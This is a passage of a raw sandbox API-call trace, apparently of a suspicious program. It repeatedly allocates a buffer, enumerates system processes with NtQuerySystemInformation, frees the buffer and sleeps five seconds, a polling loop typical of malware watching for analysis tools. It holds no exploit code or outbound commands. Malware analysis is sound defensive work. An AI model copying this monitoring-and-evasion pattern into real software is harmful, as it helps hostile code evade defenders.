FreeType=0x8000) returned 0x0 [0260.822] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.868] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.870] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.876] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.879] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.883] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.885] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.891] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.893] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.898] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.905] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.906] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.907] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.913] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.914] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.922] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.929] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.936] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.943] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.952] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.974] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.982] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.984] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.986] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0260.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0260.991] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0260.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0260.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0260.995] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0260.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0260.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.002] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.011] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.020] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.021] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0261.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0261.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0261.029] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0261.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0261.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0261.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0261.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 